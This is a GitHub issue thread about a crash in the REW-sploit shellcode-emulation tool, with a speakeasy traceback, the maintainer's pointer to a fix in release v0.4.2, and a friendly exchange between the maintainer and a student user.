For what regards the IPs, I'm pretty sure they are false positive: all the code in that part has been emulated, and there is no evidence of these IPs. But I'll let you experiment with that ;-) Thanks and regards. |
|
Thanks!
Maybe I can pick your brain over the summer since I do not fully understand emulation in terms of what it's weaknesses are or what it could be missing since I haven't emulated DLLs and such.
I plan to run REW-split over the summer too.
I need to buckle down for finals now, but I hope to keep in touch if that's okay.
…________________________________
From: cecio ***@***.***>
Sent: Thursday, May 26, 2022 6:14 AM
To: REW-sploit/REW-sploit ***@***.***>
Cc: Umali, Michelle ***@***.***>; Author ***@***.***>
Subject: Re: [REW-sploit/REW-sploit] shellcode: Caught error: 'NoneType' object has no attribute 'startswith' (Issue #13)
Solved with
mandiant/speakeasy#206<mandiant/speakeasy#206>
https://github.com/REW-sploit/REW-sploit/releases/tag/v0.4.2
—
Reply to this email directly, view it on GitHub<#13 (comment)>, or unsubscribe<https://github.com/notifications/unsubscribe-auth/AINWDOVVG3JY4SL4BHM5CVTVL52L7ANCNFSM5V5DOFWA>.
You are receiving this because you authored the thread.Message ID: ***@***.***>
|
|
Sure, feel free to get in touch whenever you want. Thanks! |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
command:
(REW-sploit)<<emulate_payload -P shell.bin -U 0
0x10d3: Error while calling API handler for kernel32.VirtualAllocEx:
Traceback:
File ".../speakeasy/windows/winemu.py", line 1168, in handle_import_func
rv = self.api.call-api_func(mod, func, argv, ctx=default_ctx)
File ".../speakeasy/winenv/api/winapi.py", line 77, in call_api_func
return func(mod, self.emu, argv, ctx)
File ".../speakeasy/winenv/api/usermode/kernel32.py" line 995, in VirtualAllocEx
if mm and mm.get_tag().startswith(tag_prefix):
AttributeError: 'NoneType' object has no attribute 'startswith'
0x77...: shellcode: Caught error: 'NoneType' object has no attribute 'startswith'
The text was updated successfully, but these errors were encountered: